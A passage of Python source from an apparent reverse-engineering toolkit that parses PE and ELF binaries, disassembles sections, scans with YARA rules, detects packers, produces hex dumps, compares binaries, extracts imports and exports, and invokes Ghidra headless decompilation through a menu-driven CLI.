    section data is read. Returns a list of instruction dicts, or a
    single-element list containing an 'error' entry.
    """
    p = Path(file_path)
    if not p.exists():
        return [{'error': 'File not found'}]

    ft = self.get_file_type(file_path)
    ftype = ft.get('type', '')

    arch = 'x64'
    sec_offset = offset
    sec_size = 0

    # Normalize the requested name once: callers may pass '.text' or 'text'.
    wanted = section.lstrip('.').lower()

    if ftype == 'PE':
        pe = self.parse_pe(file_path)
        if 'error' in pe:
            return [{'error': pe['error']}]
        machine = pe.get('machine', '')
        if '14c' in machine:
            arch = 'x86'
        elif 'aa64' in machine:
            arch = 'arm64'
        elif '1c0' in machine or '1c4' in machine:
            arch = 'arm'

        for sec in pe.get('sections', []):
            # BUG FIX: the old comparison stripped the dot from the
            # requested name but not from the section name, so the default
            # '.text' never matched any PE section. Strip NUL padding and
            # the leading dot on BOTH sides, case-insensitively.
            name = sec['name'].strip('\x00').lstrip('.').lower()
            if name == wanted:
                sec_offset = sec['raw_offset'] + offset
                sec_size = sec['raw_size']
                break

    elif ftype == 'ELF':
        elf = self.parse_elf(file_path)
        if 'error' in elf:
            return [{'error': elf['error']}]
        machine_str = elf.get('machine_str', '')
        if 'x86-64' in machine_str:
            arch = 'x64'
        elif 'x86' in machine_str:
            arch = 'x86'
        elif 'ARM64' in machine_str or 'AArch64' in machine_str:
            arch = 'arm64'
        elif 'ARM' in machine_str:
            arch = 'arm'

        # ELF section names keep their leading dot; match exactly.
        for sec in elf.get('sections', []):
            if sec['name'] == section:
                sec_offset = sec['offset'] + offset
                sec_size = sec['size']
                break

    # Read (at most 64 KiB of) the section data.
    try:
        with open(p, 'rb') as f:
            f.seek(sec_offset)
            if sec_size > 0:
                data = f.read(min(sec_size, 0x10000))
            else:
                data = f.read(0x10000)
    except Exception as e:
        return [{'error': f'Cannot read file: {e}'}]

    return self.disassemble(data, arch=arch, offset=sec_offset, count=count)

# ── YARA Scanning ────────────────────────────────────────────────────

def yara_scan(self, file_path: str, rules_path: Optional[str] = None,
              rules_string: Optional[str] = None) -> Dict[str, Any]:
    """Scan a file with YARA rules (yara-python if installed, else yara CLI)."""
    p = Path(file_path)
    if not p.exists():
        return {'error': 'File not found', 'matches': []}

    if HAS_YARA:
        return self._yara_scan_python(file_path, rules_path, rules_string)
    return self._yara_scan_cli(file_path, rules_path, rules_string)
def _yara_scan_python(self, file_path: str, rules_path: Optional[str],
                      rules_string: Optional[str]) -> Dict[str, Any]:
    """Scan using the yara-python library.

    Rule source priority: inline rules_string, then rules_path, then every
    *.yar / *.yara file in self.yara_rules_dir (namespaced by file stem).
    """
    try:
        if rules_string:
            rules = yara.compile(source=rules_string)
        elif rules_path:
            rules = yara.compile(filepath=rules_path)
        else:
            rule_files = list(self.yara_rules_dir.glob('*.yar')) + \
                list(self.yara_rules_dir.glob('*.yara'))
            if not rule_files:
                return {'error': 'No YARA rules found', 'matches': []}
            sources = {rf.stem: str(rf) for rf in rule_files}
            rules = yara.compile(filepaths=sources)

        matches = rules.match(file_path)
        results = []
        for match in matches:
            strings_found = []
            for string_match in match.strings:
                for instance in string_match.instances:
                    # Cap the reported bytes at 64 to keep results readable.
                    blob = instance.matched_data
                    strings_found.append({
                        'offset': instance.offset,
                        'identifier': string_match.identifier,
                        'data': blob.hex() if len(blob) <= 64 else blob[:64].hex() + '...',
                    })
            results.append({
                'rule': match.rule,
                'namespace': match.namespace,
                'tags': list(match.tags),
                'meta': dict(match.meta) if match.meta else {},
                'strings': strings_found,
            })

        return {'matches': results, 'total': len(results), 'engine': 'yara-python'}

    except Exception as e:
        return {'error': str(e), 'matches': []}

def _yara_scan_cli(self, file_path: str, rules_path: Optional[str],
                   rules_string: Optional[str]) -> Dict[str, Any]:
    """Scan using the yara CLI tool as a fallback.

    NOTE: unlike the yara-python path, the CLI fallback only uses the
    first rule file found in yara_rules_dir when no explicit rules are
    given (the CLI takes a single rules file).
    """
    yara_bin = find_tool('yara')
    if not yara_bin:
        return {'error': 'YARA not available. Install yara-python (pip install yara-python) or yara CLI.', 'matches': []}

    tmp_rules = None
    try:
        if rules_string:
            with tempfile.NamedTemporaryFile(suffix='.yar', mode='w', delete=False) as tmp:
                tmp.write(rules_string)
                tmp_rules = tmp.name
            rules_file = tmp_rules
        elif rules_path:
            rules_file = rules_path
        else:
            rule_files = list(self.yara_rules_dir.glob('*.yar')) + \
                list(self.yara_rules_dir.glob('*.yara'))
            if not rule_files:
                return {'error': 'No YARA rules found', 'matches': []}
            rules_file = str(rule_files[0])

        cmd = [yara_bin, '-s', rules_file, file_path]
        result = subprocess.run(cmd, capture_output=True, text=True, timeout=60)

        # Output format: a rule line, then indented "offset:identifier:data" lines.
        matches = []
        current_rule = None
        for line in result.stdout.splitlines():
            rule_match = re.match(r'^(\S+)\s+\S+$', line)
            if rule_match and ':' not in line:
                current_rule = {'rule': rule_match.group(1), 'strings': []}
                matches.append(current_rule)
            elif current_rule and ':' in line:
                parts = line.strip().split(':', 2)
                if len(parts) >= 3:
                    current_rule['strings'].append({
                        'offset': int(parts[0], 0) if parts[0].strip() else 0,
                        'identifier': parts[1].strip(),
                        'data': parts[2].strip(),
                    })

        return {'matches': matches, 'total': len(matches), 'engine': 'yara-cli'}

    except Exception as e:
        return {'error': str(e), 'matches': []}
    finally:
        # BUG FIX: the temp rules file was only unlinked on the success
        # path and leaked whenever subprocess.run raised (e.g. timeout).
        if tmp_rules:
            try:
                os.unlink(tmp_rules)
            except OSError:
                pass

def list_yara_rules(self) -> List[Dict[str, Any]]:
    """List available YARA rule files, sorted by name.

    (Annotation fixed: 'size' is an int, so values are not all str.)
    """
    rules = []
    for ext in ('*.yar', '*.yara'):
        for f in self.yara_rules_dir.glob(ext):
            stat = f.stat()
            rules.append({
                'name': f.name,
                'path': str(f),
                'size': stat.st_size,
                'modified': datetime.fromtimestamp(stat.st_mtime).isoformat(),
            })
    return sorted(rules, key=lambda x: x['name'])
# ── Packer Detection ─────────────────────────────────────────────────

def detect_packer(self, file_path: str) -> Dict[str, Any]:
    """Detect common executable packers via signatures and entropy heuristics.

    Returns {'detected', 'detections', 'overall_entropy'}; detections are
    sorted by descending confidence.
    """
    p = Path(file_path)
    if not p.exists():
        return {'detected': False, 'error': 'File not found'}

    try:
        with open(p, 'rb') as f:
            data = f.read()
    except Exception as e:
        return {'detected': False, 'error': str(e)}

    ft = self.get_file_type(file_path)
    detections = []

    # PERF FIX: parse the PE once up front instead of once per signature
    # inside the loop below.
    pe_sections = []
    if ft.get('type') == 'PE':
        pe = self.parse_pe(file_path)
        if 'error' not in pe:
            pe_sections = pe.get('sections', [])

    for packer, sig_info in PACKER_SIGNATURES.items():
        score = 0
        evidence = []

        # Magic byte patterns anywhere in the file body.
        for pattern in sig_info.get('magic', []):
            idx = data.find(pattern)
            if idx != -1:
                score += 40
                evidence.append(f'Magic pattern at offset 0x{idx:x}')

        # Characteristic section names (PE only).
        for sec in pe_sections:
            sec_name = sec['name'].encode('ascii', errors='ignore')
            for packer_sec in sig_info.get('section_names', []):
                if sec_name.rstrip(b'\x00').startswith(packer_sec.rstrip(b'\x00')):
                    score += 50
                    evidence.append(f'Section name: {sec["name"]}')

        if score > 0:
            detections.append({
                'packer': packer,
                'confidence': min(score, 100),
                'description': sig_info.get('description', ''),
                'evidence': evidence,
            })

    # Heuristic: very high whole-file entropy suggests packing/encryption.
    overall_entropy = self.calculate_entropy(data)
    if overall_entropy > 7.2:
        detections.append({
            'packer': 'Unknown (high entropy)',
            'confidence': 60,
            'description': f'High overall entropy ({overall_entropy:.2f}) suggests packing or encryption',
            'evidence': [f'Entropy: {overall_entropy:.4f}'],
        })

    # Heuristic: high-entropy sections with no signature hit.
    if ft.get('type') == 'PE':
        sec_ent = self.section_entropy(file_path)
        high_ent_sections = [s for s in sec_ent if s.get('entropy', 0) > 7.0]
        if high_ent_sections and not detections:
            names = ', '.join(s['name'] for s in high_ent_sections)
            detections.append({
                'packer': 'Unknown (packed sections)',
                'confidence': 50,
                'description': f'High entropy sections detected: {names}',
                'evidence': [f'{s["name"]}: entropy {s["entropy"]:.2f}' for s in high_ent_sections],
            })

    detections.sort(key=lambda x: -x['confidence'])

    # BUG FIX: the old return used `'overall_entropy' in dir()` which is
    # always true here (the local is assigned unconditionally above), so
    # the fallback branch was dead code.
    return {
        'detected': len(detections) > 0,
        'detections': detections,
        'overall_entropy': overall_entropy,
    }

# ── Hex Dump ─────────────────────────────────────────────────────────

def hex_dump(self, file_path: str, offset: int = 0, length: int = 256) -> Dict[str, Any]:
    """Generate a formatted hex dump of a file region.

    Returns structured 'lines' plus a preformatted 'text' rendering
    (16 bytes per row, 8-byte groups, ASCII gutter).
    """
    p = Path(file_path)
    if not p.exists():
        return {'error': 'File not found'}

    try:
        file_size = p.stat().st_size
        with open(p, 'rb') as f:
            f.seek(offset)
            data = f.read(length)
    except Exception as e:
        return {'error': str(e)}

    lines = []
    for i in range(0, len(data), 16):
        chunk = data[i:i + 16]
        hex_part = ' '.join(f'{b:02x}' for b in chunk)
        # Extra spacing between the two 8-byte groups.
        if len(chunk) > 8:
            hex_bytes = [f'{b:02x}' for b in chunk]
            hex_part = ' '.join(hex_bytes[:8]) + '  ' + ' '.join(hex_bytes[8:])
        ascii_part = ''.join(chr(b) if 32 <= b < 127 else '.' for b in chunk)
        lines.append({
            'offset': f'{offset + i:08x}',
            'hex': hex_part,
            'ascii': ascii_part,
        })

    text_lines = [f'{line["offset"]}  {line["hex"]:<49}  |{line["ascii"]}|' for line in lines]

    return {
        'offset': offset,
        'length': len(data),
        'file_size': file_size,
        'lines': lines,
        'text': '\n'.join(text_lines),
    }

def hex_search(self, file_path: str, pattern: str) -> Dict[str, Any]:
    """Search a binary file for a hex byte pattern.

    Pattern: hex bytes optionally separated by spaces/dashes.
    Wildcards ('?') are not supported and are rejected.
    Returns at most 1000 matches, each with 8 bytes of context either side.
    """
    p = Path(file_path)
    if not p.exists():
        return {'error': 'File not found', 'matches': []}

    # BUG FIX: the old code replaced '??' with 'FF' for validation but then
    # silently *dropped* '?' characters when building the search bytes,
    # shifting the pattern. Wildcards are now rejected explicitly, and an
    # empty pattern (which matched at every offset) is an error.
    if '?' in pattern:
        return {'error': 'Wildcards are not supported in hex patterns', 'matches': []}
    clean = re.sub(r'[^0-9a-fA-F]', '', pattern)
    if not clean:
        return {'error': 'Empty hex pattern', 'matches': []}
    if len(clean) % 2 != 0:
        return {'error': 'Invalid hex pattern (odd number of nibbles)', 'matches': []}

    try:
        search_bytes = bytes.fromhex(clean)
    except ValueError:
        return {'error': 'Invalid hex pattern', 'matches': []}

    try:
        with open(p, 'rb') as f:
            data = f.read()
    except Exception as e:
        return {'error': str(e), 'matches': []}

    matches = []
    start = 0
    while True:
        idx = data.find(search_bytes, start)
        if idx == -1:
            break
        context = data[max(0, idx - 8):idx + len(search_bytes) + 8]
        matches.append({
            'offset': idx,
            'offset_hex': f'0x{idx:08x}',
            'context': context.hex(),
        })
        start = idx + 1
        if len(matches) >= 1000:
            break

    return {
        'pattern': search_bytes.hex(),
        'matches': matches,
        'total': len(matches),
        'file_size': len(data),
    }
# ── Binary Comparison ────────────────────────────────────────────────

def compare_binaries(self, file1: str, file2: str) -> Dict[str, Any]:
    """Compare two binary files: sizes, hashes, section diffs, byte changes.

    Byte-level diff regions are reported over the common prefix of both
    files (the size delta is folded into 'diff_bytes'); section-level diffs
    are computed when both files share a PE or ELF format.
    """
    p1, p2 = Path(file1), Path(file2)
    if not p1.exists():
        return {'error': f'File not found: {file1}'}
    if not p2.exists():
        return {'error': f'File not found: {file2}'}

    try:
        with open(p1, 'rb') as f:
            data1 = f.read()
        with open(p2, 'rb') as f:
            data2 = f.read()
    except Exception as e:
        return {'error': str(e)}

    size1, size2 = len(data1), len(data2)

    hashes1 = {
        'md5': hashlib.md5(data1).hexdigest(),
        'sha256': hashlib.sha256(data1).hexdigest(),
    }
    hashes2 = {
        'md5': hashlib.md5(data2).hexdigest(),
        'sha256': hashlib.sha256(data2).hexdigest(),
    }
    identical = hashes1['sha256'] == hashes2['sha256']

    # Byte-level diff over the common prefix, collected as runs.
    min_len = min(size1, size2)
    diff_count = 0
    diff_regions = []
    in_diff = False
    diff_start = 0
    for i in range(min_len):
        if data1[i] != data2[i]:
            diff_count += 1
            if not in_diff:
                in_diff = True
                diff_start = i
        elif in_diff:
            in_diff = False
            diff_regions.append({
                'offset': f'0x{diff_start:08x}',
                'length': i - diff_start,
            })
    if in_diff:
        diff_regions.append({
            'offset': f'0x{diff_start:08x}',
            'length': min_len - diff_start,
        })

    # Trailing bytes of the longer file count as differences.
    if size1 != size2:
        diff_count += abs(size1 - size2)

    # Section-level comparison when both files share a PE/ELF format.
    section_diffs = []
    ft1 = self.get_file_type(file1)
    ft2 = self.get_file_type(file2)
    if ft1.get('type') == ft2.get('type') and ft1.get('type') in ('PE', 'ELF'):
        if ft1['type'] == 'PE':
            pe1, pe2 = self.parse_pe(file1), self.parse_pe(file2)
            secs1 = {s['name']: s for s in pe1.get('sections', [])}
            secs2 = {s['name']: s for s in pe2.get('sections', [])}
            size_key, off_key = 'raw_size', 'raw_offset'
        else:
            elf1, elf2 = self.parse_elf(file1), self.parse_elf(file2)
            secs1 = {s['name']: s for s in elf1.get('sections', [])}
            secs2 = {s['name']: s for s in elf2.get('sections', [])}
            size_key, off_key = 'size', 'offset'

        for name in sorted(set(secs1) | set(secs2)):
            s1 = secs1.get(name)
            s2 = secs2.get(name)
            if s1 and s2:
                sz1 = s1.get(size_key, 0)
                sz2 = s2.get(size_key, 0)
                if sz1 != sz2:
                    status = 'modified'
                else:
                    # BUG FIX: equal sizes used to be reported as
                    # 'unchanged' even when the section CONTENTS differed.
                    # Both files are already in memory, so compare bytes.
                    o1 = s1.get(off_key, 0)
                    o2 = s2.get(off_key, 0)
                    status = 'modified' if data1[o1:o1 + sz1] != data2[o2:o2 + sz2] else 'unchanged'
                section_diffs.append({
                    'name': name,
                    'status': status,
                    'size_file1': sz1,
                    'size_file2': sz2,
                })
            elif s1:
                section_diffs.append({'name': name, 'status': 'removed'})
            else:
                section_diffs.append({'name': name, 'status': 'added'})

    ent1 = self.calculate_entropy(data1)
    ent2 = self.calculate_entropy(data2)

    return {
        'file1': {'name': p1.name, 'size': size1, 'hashes': hashes1, 'entropy': ent1},
        'file2': {'name': p2.name, 'size': size2, 'hashes': hashes2, 'entropy': ent2},
        'identical': identical,
        'diff_bytes': diff_count,
        'diff_percentage': round((diff_count / max(max(size1, size2), 1)) * 100, 2),
        'diff_regions': diff_regions[:100],
        'diff_regions_total': len(diff_regions),
        'section_diffs': section_diffs,
    }

# ── Ghidra Integration ───────────────────────────────────────────────

def ghidra_decompile(self, file_path: str, function: Optional[str] = None) -> Dict[str, Any]:
    """Run Ghidra headless analysis and return decompiled output.

    Looks for analyzeHeadless on PATH, then in common install locations.
    The analysis runs in a throwaway project directory with a 300 s limit.
    """
    p = Path(file_path)
    if not p.exists():
        return {'error': 'File not found'}

    analyze_headless = find_tool('analyzeHeadless')
    if not analyze_headless:
        ghidra_paths = []
        if os.name == 'nt':
            for drive in ['C', 'D']:
                ghidra_paths.extend([
                    Path(f'{drive}:/ghidra/support/analyzeHeadless.bat'),
                    Path(f'{drive}:/Program Files/ghidra/support/analyzeHeadless.bat'),
                ])
        else:
            ghidra_paths.extend([
                Path('/opt/ghidra/support/analyzeHeadless'),
                Path('/usr/local/ghidra/support/analyzeHeadless'),
                Path.home() / 'ghidra' / 'support' / 'analyzeHeadless',
            ])
        for gp in ghidra_paths:
            if gp.exists():
                analyze_headless = str(gp)
                break

    if not analyze_headless:
        return {'error': 'Ghidra not found. Install Ghidra and ensure analyzeHeadless is in PATH.'}

    with tempfile.TemporaryDirectory(prefix='autarch_ghidra_') as tmp_dir:
        project_name = 'autarch_analysis'
        cmd = [
            analyze_headless,
            tmp_dir, project_name,
            '-import', str(p),
            '-postScript', 'DecompileHeadless.java',
            '-scriptlog', os.path.join(tmp_dir, 'script.log'),
            '-deleteProject',
        ]
        if function:
            cmd.extend(['-scriptArgs', function])

        try:
            result = subprocess.run(
                cmd, capture_output=True, text=True, timeout=300,
                cwd=tmp_dir)

            output = result.stdout + '\n' + result.stderr

            # The post-script writes its findings to script.log.
            log_path = os.path.join(tmp_dir, 'script.log')
            script_output = ''
            if os.path.exists(log_path):
                with open(log_path, 'r') as f:
                    script_output = f.read()

            return {
                'output': output,
                'script_output': script_output,
                'return_code': result.returncode,
                'function': function,
            }
        except subprocess.TimeoutExpired:
            return {'error': 'Ghidra analysis timed out (300s limit)'}
        except Exception as e:
            return {'error': f'Ghidra execution failed: {e}'}

# ── Import / Export Extraction ───────────────────────────────────────

def get_imports(self, file_path: str) -> List[Dict[str, Any]]:
    """Extract imported functions from a PE or ELF binary."""
    ftype = self.get_file_type(file_path).get('type', '')
    if ftype == 'PE':
        return self._get_pe_imports(file_path)
    if ftype == 'ELF':
        return self._get_elf_imports(file_path)
    return []
def _get_pe_imports(self, file_path: str) -> List[Dict[str, Any]]:
    """Parse the PE import directory table.

    Walks IMAGE_IMPORT_DESCRIPTOR entries (five little-endian u32 fields,
    20 bytes each, terminated by an all-zero entry) and resolves imported
    names through the import lookup table.  Returns a list of
    {'library', 'functions', 'count'} dicts.
    """
    pe = self.parse_pe(file_path)
    if 'error' in pe:
        return []

    try:
        with open(file_path, 'rb') as f:
            data = f.read()
    except Exception:
        return []

    import_dir = None
    for dd in pe.get('data_directories', []):
        if dd['name'] == 'Import':
            import_dir = dd
            break
    if not import_dir:
        return []

    import_rva = int(import_dir['rva'], 16)
    if import_rva == 0:
        return []

    sections = pe.get('sections', [])

    def rva_to_offset(rva):
        # Map an RVA to a raw file offset via the section table.
        for sec in sections:
            sec_va = int(sec['virtual_address'], 16)
            if sec_va <= rva < sec_va + sec['virtual_size']:
                return sec['raw_offset'] + (rva - sec_va)
        return rva

    def read_cstr(off):
        end = data.find(b'\x00', off)
        if end == -1:
            end = len(data)
        return data[off:end].decode('ascii', errors='replace')

    # PE32+ thunks are 8 bytes wide; infer bitness from the machine type.
    # NOTE(review): assumes pe['machine'] contains the hex machine id
    # (0x8664 = x64, 0xaa64 = ARM64) — confirm against parse_pe.
    machine = pe.get('machine', '')
    is_64 = '8664' in machine or 'aa64' in machine
    thunk_size = 8 if is_64 else 4
    ordinal_flag = (1 << 63) if is_64 else (1 << 31)
    thunk_fmt = '<Q' if is_64 else '<I'

    imports: List[Dict[str, Any]] = []
    offset = rva_to_offset(import_rva)

    while offset + 20 <= len(data):
        ilt_rva, timestamp, forwarder, name_rva, iat_rva = struct.unpack_from(
            '<IIIII', data, offset)
        if ilt_rva == 0 and name_rva == 0 and iat_rva == 0:
            break  # all-zero descriptor terminates the table

        lib_name = read_cstr(rva_to_offset(name_rva)) if name_rva else ''
        functions = []

        # Prefer the lookup table; fall back to the bound address table.
        thunk_rva = ilt_rva or iat_rva
        toff = rva_to_offset(thunk_rva) if thunk_rva else 0
        while toff and toff + thunk_size <= len(data):
            entry = struct.unpack_from(thunk_fmt, data, toff)[0]
            if entry == 0:
                break
            if entry & ordinal_flag:
                functions.append({'name': f'ordinal_{entry & 0xffff}',
                                  'ordinal': entry & 0xffff})
            else:
                # Entry is an RVA to IMAGE_IMPORT_BY_NAME (u16 hint + name).
                hint_off = rva_to_offset(entry & 0x7fffffff)
                if 0 <= hint_off and hint_off + 2 < len(data):
                    functions.append({'name': read_cstr(hint_off + 2),
                                      'ordinal': None})
            toff += thunk_size
            if len(functions) >= 4096:
                break  # sanity cap on malformed tables

        imports.append({'library': lib_name, 'functions': functions,
                        'count': len(functions)})
        offset += 20
        if len(imports) >= 256:
            break  # sanity cap on malformed tables

    return imports

def _get_elf_imports(self, file_path: str) -> List[Dict[str, Any]]:
    """Extract imported (undefined) symbols from the ELF dynamic symbol table.

    Returns one entry per DT_NEEDED library plus a synthetic
    '(dynamic imports)' entry holding the undefined symbols.
    """
    elf = self.parse_elf(file_path)
    if 'error' in elf:
        return []

    try:
        with open(file_path, 'rb') as f:
            data = f.read()
    except Exception:
        return []

    is_64 = '64-bit' in elf.get('class', '')
    endian = '<' if 'Little' in elf.get('endianness', 'Little') else '>'

    dynsym_sec = None
    dynstr_sec = None
    for sec in elf.get('sections', []):
        if sec['name'] == '.dynsym':
            dynsym_sec = sec
        elif sec['name'] == '.dynstr':
            dynstr_sec = sec
    if not dynsym_sec or not dynstr_sec:
        return []

    str_off = dynstr_sec['offset']
    str_size = dynstr_sec['size']
    if str_off + str_size > len(data):
        return []
    strtab = data[str_off:str_off + str_size]

    sym_off = dynsym_sec['offset']
    sym_size = dynsym_sec['size']
    entry_size = 24 if is_64 else 16

    imports = []
    for i in range(0, sym_size, entry_size):
        off = sym_off + i
        if is_64 and off + 24 <= len(data):
            st_name, st_info, st_other, st_shndx, st_value, st_size = struct.unpack_from(
                f'{endian}IBBHQQ', data, off)
        elif not is_64 and off + 16 <= len(data):
            st_name, st_value, st_size, st_info, st_other, st_shndx = struct.unpack_from(
                f'{endian}IIIBBH', data, off)
        else:
            break

        # Undefined symbols (imports) have section index SHN_UNDEF (0).
        if st_shndx == 0 and 0 < st_name < len(strtab):
            end = strtab.find(b'\x00', st_name)
            if end != -1:
                sym_name = strtab[st_name:end].decode('ascii', errors='replace')
                if sym_name:
                    bind = (st_info >> 4) & 0xf
                    sym_type = st_info & 0xf
                    imports.append({
                        'name': sym_name,
                        'bind': {0: 'LOCAL', 1: 'GLOBAL', 2: 'WEAK'}.get(bind, str(bind)),
                        'type': {0: 'NOTYPE', 1: 'OBJECT', 2: 'FUNC'}.get(sym_type, str(sym_type)),
                    })

    # DT_NEEDED (tag 1) entries name the required shared libraries.
    needed_libs = []
    for dyn in elf.get('dynamic', []):
        if dyn['tag'] == 1:
            val = int(dyn['value'], 16)
            if val < len(strtab):
                end = strtab.find(b'\x00', val)
                if end != -1:
                    needed_libs.append(strtab[val:end].decode('ascii', errors='replace'))

    result = [{'library': lib, 'functions': [], 'count': 0} for lib in needed_libs]
    if imports:
        result.append({'library': '(dynamic imports)', 'functions': imports,
                       'count': len(imports)})
    return result

def get_exports(self, file_path: str) -> List[Dict[str, Any]]:
    """Extract exported functions from a PE or ELF binary."""
    ftype = self.get_file_type(file_path).get('type', '')
    if ftype == 'PE':
        return self._get_pe_exports(file_path)
    if ftype == 'ELF':
        return self._get_elf_exports(file_path)
    return []

def _get_pe_exports(self, file_path: str) -> List[Dict[str, Any]]:
    """Parse the PE export directory table (IMAGE_EXPORT_DIRECTORY, 40 bytes).

    Resolves names via AddressOfNames, biased ordinals via
    AddressOfNameOrdinals, and function RVAs via AddressOfFunctions.
    """
    pe = self.parse_pe(file_path)
    if 'error' in pe:
        return []

    try:
        with open(file_path, 'rb') as f:
            data = f.read()
    except Exception:
        return []

    export_dir = None
    for dd in pe.get('data_directories', []):
        if dd['name'] == 'Export':
            export_dir = dd
            break
    if not export_dir:
        return []

    export_rva = int(export_dir['rva'], 16)
    if export_rva == 0:
        return []

    sections = pe.get('sections', [])

    def rva_to_offset(rva):
        for sec in sections:
            sec_va = int(sec['virtual_address'], 16)
            if sec_va <= rva < sec_va + sec['virtual_size']:
                return sec['raw_offset'] + (rva - sec_va)
        return rva

    def read_cstr(off):
        end = data.find(b'\x00', off)
        if end == -1:
            end = len(data)
        return data[off:end].decode('ascii', errors='replace')

    offset = rva_to_offset(export_rva)
    if offset + 40 > len(data):
        return []

    # Characteristics, TimeDateStamp, Major/MinorVersion, Name, Base,
    # NumberOfFunctions, NumberOfNames, AddressOfFunctions,
    # AddressOfNames, AddressOfNameOrdinals.
    (_, timestamp, major_ver, minor_ver, name_rva, ordinal_base,
     num_functions, num_names, addr_functions_rva, addr_names_rva,
     addr_ordinals_rva) = struct.unpack_from('<IIHHIIIIIII', data, offset)

    names_offset = rva_to_offset(addr_names_rva)
    ordinals_offset = rva_to_offset(addr_ordinals_rva)
    functions_offset = rva_to_offset(addr_functions_rva)

    exports = []
    for i in range(min(num_names, 10000)):  # sanity cap on malformed tables
        noff = names_offset + i * 4
        if noff + 4 > len(data):
            break
        name_rva = struct.unpack_from('<I', data, noff)[0]
        if name_rva:
            func_name = read_cstr(rva_to_offset(name_rva))
        else:
            func_name = f'unnamed_{i}'

        ordinal = 0
        if ordinals_offset + (i + 1) * 2 <= len(data):
            ordinal = struct.unpack_from('<H', data, ordinals_offset + i * 2)[0] + ordinal_base

        address = ''
        idx = ordinal - ordinal_base
        faddr_off = functions_offset + idx * 4
        if 0 <= idx < num_functions and faddr_off + 4 <= len(data):
            address = f'0x{struct.unpack_from("<I", data, faddr_off)[0]:x}'

        exports.append({'name': func_name, 'ordinal': ordinal, 'address': address})

    return exports

def _get_elf_exports(self, file_path: str) -> List[Dict[str, Any]]:
    """Extract exported (defined GLOBAL/WEAK) symbols from the ELF .dynsym."""
    elf = self.parse_elf(file_path)
    if 'error' in elf:
        return []

    try:
        with open(file_path, 'rb') as f:
            data = f.read()
    except Exception:
        return []

    is_64 = '64-bit' in elf.get('class', '')
    endian = '<' if 'Little' in elf.get('endianness', 'Little') else '>'

    dynsym_sec = None
    dynstr_sec = None
    for sec in elf.get('sections', []):
        if sec['name'] == '.dynsym':
            dynsym_sec = sec
        elif sec['name'] == '.dynstr':
            dynstr_sec = sec
    if not dynsym_sec or not dynstr_sec:
        return []

    str_off = dynstr_sec['offset']
    str_size = dynstr_sec['size']
    if str_off + str_size > len(data):
        return []
    strtab = data[str_off:str_off + str_size]

    sym_off = dynsym_sec['offset']
    sym_size = dynsym_sec['size']
    entry_size = 24 if is_64 else 16

    exports = []
    for i in range(0, sym_size, entry_size):
        off = sym_off + i
        if is_64 and off + 24 <= len(data):
            st_name, st_info, st_other, st_shndx, st_value, st_size = struct.unpack_from(
                f'{endian}IBBHQQ', data, off)
        elif not is_64 and off + 16 <= len(data):
            st_name, st_value, st_size, st_info, st_other, st_shndx = struct.unpack_from(
                f'{endian}IIIBBH', data, off)
        else:
            break

        # Exported = defined (shndx != 0) with GLOBAL (1) or WEAK (2) binding.
        bind = (st_info >> 4) & 0xf
        if st_shndx != 0 and bind in (1, 2) and 0 < st_name < len(strtab):
            end = strtab.find(b'\x00', st_name)
            if end != -1:
                sym_name = strtab[st_name:end].decode('ascii', errors='replace')
                if sym_name:
                    sym_type = st_info & 0xf
                    exports.append({
                        'name': sym_name,
                        'address': f'0x{st_value:x}',
                        'type': {0: 'NOTYPE', 1: 'OBJECT', 2: 'FUNC'}.get(sym_type, str(sym_type)),
                        'size': st_size,
                    })

    return exports

# ── Utility Methods ──────────────────────────────────────────────────

@staticmethod
def _human_size(size: int) -> str:
    """Convert a byte count to a human-readable string (B through PB)."""
    for unit in ['B', 'KB', 'MB', 'GB', 'TB']:
        if size < 1024:
            return f'{size:.1f} {unit}' if unit != 'B' else f'{size} {unit}'
        size /= 1024
    return f'{size:.1f} PB'

def print_status(self, message: str, status: str = "info"):
    """Print a colour-coded status line ([*]/[+]/[!]/[X])."""
    colors = {"info": Colors.CYAN, "success": Colors.GREEN,
              "warning": Colors.YELLOW, "error": Colors.RED}
    symbols = {"info": "*", "success": "+", "warning": "!", "error": "X"}
    print(f"{colors.get(status, Colors.WHITE)}[{symbols.get(status, '*')}] {message}{Colors.RESET}")

# ── CLI Interface ────────────────────────────────────────────────────

def show_menu(self):
    """Render the interactive menu header and option list."""
    clear_screen()
    display_banner()
    print(f"{Colors.CYAN}{Colors.BOLD} Reverse Engineering Toolkit{Colors.RESET}")
    print(f"{Colors.DIM} Binary analysis, disassembly & YARA scanning{Colors.RESET}")
    print(f"{Colors.DIM} {'=' * 50}{Colors.RESET}")
    print()
    print(f" {Colors.CYAN}[1]{Colors.RESET} Analyze Binary")
    print(f" {Colors.CYAN}[2]{Colors.RESET} Disassemble")
    print(f" {Colors.CYAN}[3]{Colors.RESET} YARA Scan")
    print(f" {Colors.CYAN}[4]{Colors.RESET} Hex Dump")
    print(f" {Colors.CYAN}[5]{Colors.RESET} Detect Packer")
    print(f" {Colors.CYAN}[6]{Colors.RESET} Compare Binaries")
    print()
    print(f" {Colors.DIM}[0]{Colors.RESET} Back")
    print()
def _prompt(self, label: str) -> str:
    """Read one stripped line of input with the standard prompt colouring."""
    return input(f"{Colors.WHITE} {label}{Colors.RESET}").strip()

def cli_analyze(self):
    """Interactive wrapper around analyze_binary: prompt, run, pretty-print."""
    filepath = self._prompt("Enter file path: ")
    if not filepath:
        return
    result = self.analyze_binary(filepath)
    if 'error' in result:
        self.print_status(result['error'], 'error')
        return
    print(f"\n{Colors.CYAN}{'=' * 60}{Colors.RESET}")
    print(f" {Colors.BOLD}{result['name']}{Colors.RESET}")
    print(f" Type: {result['file_type'].get('type', 'unknown')} | "
          f"Arch: {result['architecture']} | Size: {result['size_human']}")
    print(f"\n {Colors.CYAN}Hashes:{Colors.RESET}")
    for algo, val in result['hashes'].items():
        print(f"   {algo.upper():8} {val}")
    print(f"\n {Colors.CYAN}Entropy:{Colors.RESET} {result['entropy']} ({result['entropy_level']})")
    if result['section_entropy']:
        for s in result['section_entropy']:
            bar = '#' * int(s['entropy'] * 3)
            # Red above 7.0, yellow above 6.0, green otherwise.
            color = Colors.RED if s['entropy'] > 7.0 else (Colors.YELLOW if s['entropy'] > 6.0 else Colors.GREEN)
            print(f"   {s['name']:12} {color}{s['entropy']:.2f}{Colors.RESET} {bar}")
    print(f"\n {Colors.CYAN}Strings:{Colors.RESET} {result['strings_count']} found")
    if result['packer']['detected']:
        print(f"\n {Colors.RED}Packer Detected:{Colors.RESET}")
        for d in result['packer']['detections']:
            print(f"   {d['packer']} (confidence: {d['confidence']}%)")

def cli_disassemble(self):
    """Interactive wrapper around disassemble_file."""
    filepath = self._prompt("Enter file path: ")
    if not filepath:
